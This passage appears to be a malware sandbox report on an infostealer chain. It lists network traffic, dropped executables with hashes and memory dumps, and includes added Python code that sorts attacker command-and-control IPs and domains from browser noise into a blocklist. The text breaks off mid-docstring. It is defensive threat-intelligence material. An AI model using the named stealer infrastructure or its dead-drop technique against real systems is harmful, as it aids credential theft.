US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:60565 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2---sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 216.58.213.14:443 consent.youtube.com udp
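
Most rows in the Network table are Firefox and Windows background traffic dragged in by the kiosk-mode lure (Mozilla remote settings, Pocket, Bing, Google, the OpenH264 download); the stealer's own infrastructure is a handful of raw IPs on port 80 and a few throwaway domains, plus a list of names that were only ever resolved. The Python below is an added example for this report, not sandbox code. NET_ROWS is a subset copied from the table; the benign-suffix allow-list, the dead-drop list and the bucketing rules are this example's assumptions.

```python
"""Separate attacker infrastructure from browser and sandbox background noise in
the report's Network table, and turn the result into a blocklist. Added example
for this report, not the sandbox's own code: NET_ROWS is copied from the table;
BENIGN_SUFFIXES, DEAD_DROP and the bucketing rules are assumptions."""
import re
from collections import defaultdict

# Constructed input: rows copied from the report's Network table.
NET_ROWS = """\
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.16.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:60556 tcp
"""

ROW_RE = re.compile(r"^(\S+) (\S+):(\d+)(?: (\S+))? (tcp|udp)$")
IPV4_RE = re.compile(r"\d+\.\d+\.\d+\.\d+")

# Assumption: hosts a stock Firefox/Windows sandbox contacts on its own.
# youtube.com/google.com are here because the firefox.exe --kiosk lure in the
# Processes section opened them: they are the lure page, not the stealer's C2.
BENIGN_SUFFIXES = ("mozilla.net", "mozilla.com", "mozaws.net", "mozgcp.net",
                   "getpocket.com", "bing.com", "bing.net", "google.com",
                   "gvt1.com", "akamai.net", "openh264.org", "youtube.com")
# Legitimate site used as a dead-drop resolver (Vidar reads its C2 from a
# Steam profile page); hunt for the fetched URL, do not firewall the domain.
DEAD_DROP = {"steamcommunity.com"}

def is_benign(name):
    return any(name == s or name.endswith("." + s) for s in BENIGN_SUFFIXES)

def parse(text):
    conns = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            conns.append({"cc": m[1], "ip": m[2], "port": int(m[3]),
                          "domain": m[4], "proto": m[5]})
    return conns

def classify(conns):
    """Returns ({bucket: sorted names}, {domain: {resolved ips}})."""
    queried, connected, resolved = set(), set(), defaultdict(set)
    for c in conns:
        if c["ip"].startswith("127."):
            continue                       # loopback browser IPC, never an IOC
        if c["port"] == 53:
            queried.add(c["domain"])
            continue
        name = c["domain"] or c["ip"]
        connected.add(name)
        if name != c["ip"]:
            resolved[name].add(c["ip"])
    buckets = defaultdict(set)
    for name in connected:
        if is_benign(name):
            buckets["benign"].add(name)
        elif name in DEAD_DROP:
            buckets["dead_drop"].add(name)
        elif IPV4_RE.fullmatch(name):
            buckets["direct_ip"].add(name)  # hard-coded C2, no DNS at all
        else:
            buckets["c2_domain"].add(name)
    for name in queried - connected:
        if not is_benign(name):
            buckets["dns_only"].add(name)   # fallback C2 list, unused this run
    return {k: sorted(v) for k, v in buckets.items()}, dict(resolved)

def blocklist(buckets):
    """Names and raw IPs to block. Resolved IPs of the domains are left out on
    purpose: 104.21.16.1 and 172.67.220.226 are shared Cloudflare edges."""
    out = set(buckets.get("direct_ip", []))
    for k in ("c2_domain", "dns_only"):
        out.update(buckets.get(k, []))
    return sorted(out)
```

Two caveats a blocklist built from this table must respect. exarthynature.run and farmingtzricks.top resolve to Cloudflare addresses shared with countless unrelated sites, so block the names and not 104.21.16.1 or 172.67.220.226. steamcommunity.com is a legitimate site used as a dead drop, so it belongs in a hunt for the profile URL the sample fetched rather than in a firewall rule. The DNS-only names (dawtastream.bet, foresctwhispers.top and the rest of that run of lookups) are the fallback list the stealer walks until one answers; they are worth blocking even though nothing connected to them here, and the pattern of a dozen lookups to fresh .top/.fun/.life/.icu names within seconds of each other is itself a usable detection on resolver logs.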

Files

C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta

MD5 4e701582cd99c1553aa60dccfd9d98dd
SHA1 30bdcc5da83588b5607a8e44300e26d61a9e4d94
SHA256 ef0c98f3a26c461d88247989f55403d5837a8569893338df2f0d9fa442b3053d
SHA512 de9512e80a396223824eabb06839a486f6009c1f676a07b7669d2fe91ff6c4e00f98e0fc7b34d97ee63964ad9aab8a1d258173ce3ecb714feb981082c40c8880

memory/3420-2-0x00000000022F0000-0x0000000002326000-memory.dmp

memory/3420-3-0x0000000004EB0000-0x00000000054D8000-memory.dmp

memory/3420-4-0x0000000004D70000-0x0000000004D92000-memory.dmp

memory/3420-6-0x00000000055F0000-0x0000000005656000-memory.dmp

memory/3420-5-0x0000000005580000-0x00000000055E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyqboxv4.eoa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3420-16-0x0000000005760000-0x0000000005AB4000-memory.dmp

memory/3420-17-0x0000000005C20000-0x0000000005C3E000-memory.dmp

memory/3420-18-0x0000000005C70000-0x0000000005CBC000-memory.dmp

memory/3420-19-0x0000000007360000-0x00000000079DA000-memory.dmp

memory/3420-20-0x0000000006170000-0x000000000618A000-memory.dmp

memory/3420-22-0x00000000070C0000-0x0000000007156000-memory.dmp

memory/3420-23-0x0000000007060000-0x0000000007082000-memory.dmp

memory/3420-24-0x0000000007F90000-0x0000000008534000-memory.dmp

C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/928-32-0x0000000000F40000-0x0000000001402000-memory.dmp

memory/984-48-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/928-47-0x0000000000F40000-0x0000000001402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe

MD5 7ebfd3c200d1cef79141205b2232d04e
SHA1 9507b4780dc90ac98995ab6987cb76cc3e85cf3d
SHA256 ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38
SHA512 17cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f

memory/984-62-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-63-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-65-0x0000000000550000-0x0000000000F37000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/2900-83-0x00000000006A0000-0x0000000000718000-memory.dmp

memory/2016-87-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2016-85-0x0000000000400000-0x0000000000465000-memory.dmp

memory/772-89-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/772-91-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-92-0x0000000000550000-0x0000000000F37000-memory.dmp

memory/984-93-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-94-0x0000000000550000-0x0000000000F37000-memory.dmp

memory/2556-95-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2556-97-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4480-98-0x0000000000550000-0x0000000000F37000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe

MD5 cc1a40ae718a316ece1fa40898297c32
SHA1 1400b072dffc6b9300e48b35bbb8f9f9a93ae357
SHA256 0f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c
SHA512 af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd

memory/2936-113-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/2556-117-0x0000000010000000-0x000000001001C000-memory.dmp

memory/984-122-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe

MD5 ecbd88e7bb854e4ce89e94f5e76d0116
SHA1 2a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd
SHA256 c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684
SHA512 cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020

memory/3584-139-0x0000000000540000-0x00000000009E8000-memory.dmp

memory/2936-140-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/2936-163-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/1432-177-0x0000000000440000-0x000000000046F000-memory.dmp

memory/1432-182-0x0000000000440000-0x000000000046F000-memory.dmp

memory/2936-183-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/3584-185-0x0000000000540000-0x00000000009E8000-memory.dmp

memory/984-194-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110550101\eb8bc5e18e.exe

MD5 ec5b5dbeee457eade1319136d786850b
SHA1 0e6a0d30c3048a511e7d90c4759af1f11384692c
SHA256 d5ecff66c02169361b784ecab66f17ca6ebb39e1064c584ed1a77408f3e50b62
SHA512 593e884fd85ef3fddc8578ba6568062e764093ab6281c248c33ffa76e9fd448ee3690942f67d8523ba222f78b1ed9a063aed935c1f55e5fc60a13fb5d8561339

C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe

MD5 629300ff81436181f8f475448ae88ccc
SHA1 26d771f0ec5f24c737708a0006d17d2d41b43459
SHA256 9e33286f53f3ce4b98cb00dca5c365c82a0c1ded9ef0402d7d4270a607c127e6
SHA512 467559eb2ada21818816f4713501ee944694875b57ccd721d92b5507f6fcaf1020ffcb1bbc5f41264f6d777701a1e4607ae06277d74fc4e1e0d4477b5b433da0

memory/3044-229-0x0000000000950000-0x0000000000FE9000-memory.dmp

memory/3044-231-0x0000000000950000-0x0000000000FE9000-memory.dmp

memory/984-233-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

MD5 de9fdda5de6c4dfaffb86be4ee98d70a
SHA1 c0c4a6ae8003f5508c92c8bbb037c49fff06a5c3
SHA256 952b6fb34399b787bae14c027165482d38c5355e16d6f1d9f84fa62e6c7c6c92
SHA512 74e44c48e92b0f4ad763dbed41b9252072e0ad27dfef651460fd1500fdfc11ef164853aabb056a71b0d4df01975efd8bfd111565a80ad79b441ab544b1c14592

C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe

MD5 8564841b483e528b91605c2be1b8ccf5
SHA1 5f46911b3c1cb8199f13d0110ebd6d76232a6cc4
SHA256 eed57746d76ad12b0bb7f4f4797c2929c71c58bdf953caa41b1464b925642ce2
SHA512 480eb504430e3156f5e3be7ec724e187fb8c214d0ff306d5af99904414a17a648cfd345f100c9a6d31e6e18c695f1b8647b3c05961e8296bcb2aa9a548a65484

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\326254d2-556d-42f7-a818-c2d006b4bc2f

MD5 9ecda4bcedb75d4477b4ebe4cf57fd50
SHA1 2536668c721e978b657f94b8d1d07e2688a05b6a
SHA256 3273f2deba9f35f89517ca972979b963120b43e24a919c1e245c916937c75170
SHA512 4d3a4d8025b4fe3585b505623f28754a904a0e1aebcaf76f900e30fe258342e5036d266199da8ab76d55282489edafb329c69218bd7306d83a2149806305ef1b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\b2e3645d-9841-4288-8926-32b248fbdfc5

MD5 60d6bb06f2239570fb2c6be8ef27e529
SHA1 a3f1545609d275d3b621bac4e78df17af4acb0cd
SHA256 26f179e62ba3927f2ab51ccbed5e0a3eee744159ea8da24d1a7c1b71428b5775
SHA512 54616ccde59820f4985e7de1564198c6a295989c76da12129d456ed636404031cec8a3faadf5bbf0f1119003e814c0206e8c83c7418b6a77cd1d05cc83acc0b7

memory/5624-499-0x0000000000CB0000-0x0000000001120000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 189d6a8d8fc3de232f582fa506a67f4c
SHA1 d81ff8c5f86e7602b699f8be8259ac10a5504043
SHA256 07ad29eae1fb3a4858eb5f19f46994c29415899b5bf5fe1279407d17eda59aef
SHA512 a08bf1c4d584cdcacf810ea917098ce37d30144dbff83c0182b5d58d3f5bf9bf75a980e491e2df48bc37f325075128d5d3f8f06e8f795aec176ad39f5b7bd214

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\8b2cb0da-e4ce-4ce7-a6d3-dd58971d512a

MD5 518eb2b9c9860a34ec53e39a01423ae4
SHA1 da3f10ba7866b172b8cbc0358e58bb69dca2a2ac
SHA256 648038a2d087d40e019c7efbb6a6ccde079a045f0b2d93bf03de069311bbccb4
SHA512 9d653362d235b6cab6eb960d4f1977055a25f5bac27749b16419f8e0e7fb405afd19195764d950149d6dfe084ad2b1720b429ae95ba4ab7b5ebb84db9bc09d10

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 87449ff0d108552ed663f402e5e4dc95
SHA1 3ad7695a8dc79ecc17c7085479e4d38257d9c19b
SHA256 223a65beffb7cc3f80897a652cc494722d1caac04ade3a6e3fbee4bde0754250
SHA512 1da36b3498b6e00776aa58b96cc9c9a2605c5dbf5165dd995151d50bccbf0bd08ac587a3a059b888b69a5bdbac3bf627c2cfaddfd1d31c6c5abee1f17ad239d7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\activity-stream.discovery_stream.json

MD5 4a49051c1914633ce83836ecc8956b4e
SHA1 9e25150168216dcc924242c2db31653165846b7e
SHA256 1624898a74941700ec9a09972b7f1ae607105fb6cc393846ba29963bc7a2fd19
SHA512 e953575d73b413fb2fb568b217e4ee5f565e7c238e767ecf5e07fdbddc5bf78a1d71970fb39fae23f86c5e635cf0de18169c5ca2ed0081ee830665c0b3ee83fb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin

MD5 7b9194844289ccc315e4eb1e6e0244a7
SHA1 908c3356df0eb71cdccc9465ec29d4a8992b4669
SHA256 9ffacb3e098c9f0f65afa2e90e6f7feeb18aa40aaa801f66eb3709aed1832016
SHA512 9be58d83b8a4539f8db2c47d2c79d507a5db935ed4d2b3a69a37d1813fac0b7f0178ceea77e4d220c2b4db8901b35cedfdaca260b13fb70c7b0f8d6ef64062ca

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 89cb8e8b0f29afeef20d46d627684784
SHA1 929876fc7b746e46472eb35bfb1e663d5cafef9a
SHA256 71e60edd60e5a9072ab01d3d11b6198a1247b4280d4ba61984f862d4d2be03c7
SHA512 70d46d4ffd8cc1e7f522e855d810c9af7b45acb445d4460f6be77016bd72ad5d2aaf1580ccac7d77581c1003a1a61923902b12124fde198f65206086c593758b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 f69129fa6e21da91d2a81ff8823d0231
SHA1 45ede2673ba843acd3309315f6eb4b09989a2fca
SHA256 275554a12321eaecd0149b6a946b7c32956223c03cb7a010a0c7fa4683f1a8ee
SHA512 1d5fe06f69ba5f08f344c718e0e175c9c17ce09de00669630e5a5682e42579c65b823bad71729b251578197dd19949d3aeaa6afdfba9682d3b0dac1add757763

memory/5624-588-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/5624-580-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/984-613-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 4874f06decaf2e1b7508f4ccd5f3d5ba
SHA1 4e4d48e8271c1ce9b0ffae5411a9e0bbdc28f139
SHA256 829a4a7d57389530925afbc4f65338b3b45623844082791a0b9d498145c966fd
SHA512 78f153a492f87495df737609fea616870c0b9f0c2e6e9821e9cf8b5d90998c83e27466efeb9a9a2f66f31c78be0e6542c924090a94fca3af5b4a23a2518886ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 7d823cfccec530f4b99d2d7de99876c2
SHA1 c0ee9c44ed3b6cffc0923139fb311716be2e84e0
SHA256 149a85238d404a6b84a77213dfd01a3811d6b2fe91959a7c444037c88203edec
SHA512 637f936d82db378a901b4f896e2dfdeddee836d98b0fe9dcc38c16c382441c9f34fd09fea799fe44624021068b531cd8a518286a9934ed1786568f0b3e6c06df

memory/5624-665-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/5624-674-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/984-675-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 3935a21b6e1a3295e1ba457908701d64
SHA1 5a48fd17e6fd6cffa139a395dd38182f6971e4c2
SHA256 c68ebc6b0cf81b5e367fbca67be38597852e41d10fb8f3573984af8a61709960
SHA512 4bbce353b2b3358136f0798825f01a0411e00639d23e0385a884a6eb36048f6ab60a455277a15a8ac87209769e24bafd323a38675b0766196aadd1248410160b

memory/3664-695-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 fd48a8ad9553e0274c24d79df27c05a6
SHA1 b0642747b04b4dadfc5f651728c7c4143e1e9b60
SHA256 719c37a7098ac3ccf37999c3f06effb828854a8452ebe2f80693a44f0199169a
SHA512 233875755d996ec91543c7c0d7af9073c8268f74d474d9eca6abe4e4aae22b4a3b3f3e8aae6873e9c24c8e57465651f2bbdd686702404dd519433f55bdcb47f3

memory/3664-710-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 82f9c241e66d06b758ba9d4233903153
SHA1 812ccf2a07e539c62c81e1587b83d38ef49bf802
SHA256 aa009c5b0244e6ff24f1fd3d818b5b28da576bf957c703a9c0f499f5e29a560c
SHA512 18d217ae0312935722dab208a029965abf0fc9854bca10d590ac697fdaf6423b6fff56ecd6bce58cec1d34c98a786f0eb48eaa9a70a05ed951072e368fdc3f10

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 917c3e6321d9f4fd8652fca32aac6d6b
SHA1 01e0cd1bad70560b7f28aa7da8707860165820b5
SHA256 74cb9ab31073de9e121dde61f113cd4ff17eaf598e12c4c3b325769a6ac4ec91
SHA512 44870eea95ed2d64c3080a98abd8f417e8a6df208d476f0a6517318b5c28e225d22125d25bc2a9d0b95fb4f6dc5519e666f55ffa0d08d7c5189b70ec56a20104

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/984-841-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 110bc7ae6bd1709c151f2989f7883919
SHA1 b8a082d6980bb997a64ffd6d92a8bdefd742d20a
SHA256 898016830d29947e641ba662367662a64ffc3a7996d661b606bbcc78dd232eda
SHA512 23a8f03d8bfbf33f0752a88906b2fb2ca5dec7db2bca35a30f011ce2cdc550288d2107ceb7b27e384d9f8343b700a60f595d8bcfa977564313f104f578b59d21

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs-1.js

MD5 cc6fcbc0df531a05fbde0a8e727387d6
SHA1 e258517c85ab990b056dc36d49e47b285205c613
SHA256 050aff07021a039dcd31c1182228d9537ccda931d7e109bd968c543b7ed6dcf9
SHA512 feec0c0c545c66214f4a62fd34107c557d1f8f5b2a225fdbe639c06f3b318d327895d7184e90b8b58d8f34683dae5fecd3a43e64d8ed6598996e82b51a4ee859

memory/984-2914-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3711-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3714-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3718-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3720-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 06f2bf604094d7a50950c63a42472d7b
SHA1 4001209cfe41b43f6b1e0940b41fada952a3883c
SHA256 7da60962ee6d1a9e1ac49c968f645d6ed74ef379c2df1144ee61d92bccd71a01
SHA512 f157e3dba866a23846c5d31fb75ddea909fd497e37663f17bf4fcc6c70ff94316fcdf98c300ffa639ae355c9de3d9e2fc7706d1cbdd22c53fe0b42db1f02e4db

memory/3420-3722-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/3420-3723-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3724-0x0000000000BA0000-0x0000000001062000-memory.dmp
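The Files list above is the report's dropped-file inventory: each path is followed by its MD5/SHA1/SHA256/SHA512 digests, and the `memory/<pid>-<seq>-<start>-<end>-memory.dmp` lines record the process memory regions the sandbox dumped. The Python below is an added example, not part of the report or of the sandbox's own tooling: it parses that layout into records, builds a hash index and matches file contents against it. The excerpt embedded in it is copied verbatim from the entries above; the function names and the strongest-hash-first matching policy are this example's own choices.

```python
"""Turn the report's Files section into usable IOC records.

Added example, not from the original report. REPORT_EXCERPT is copied
from the report's own Files entries; everything else is this example's
design.
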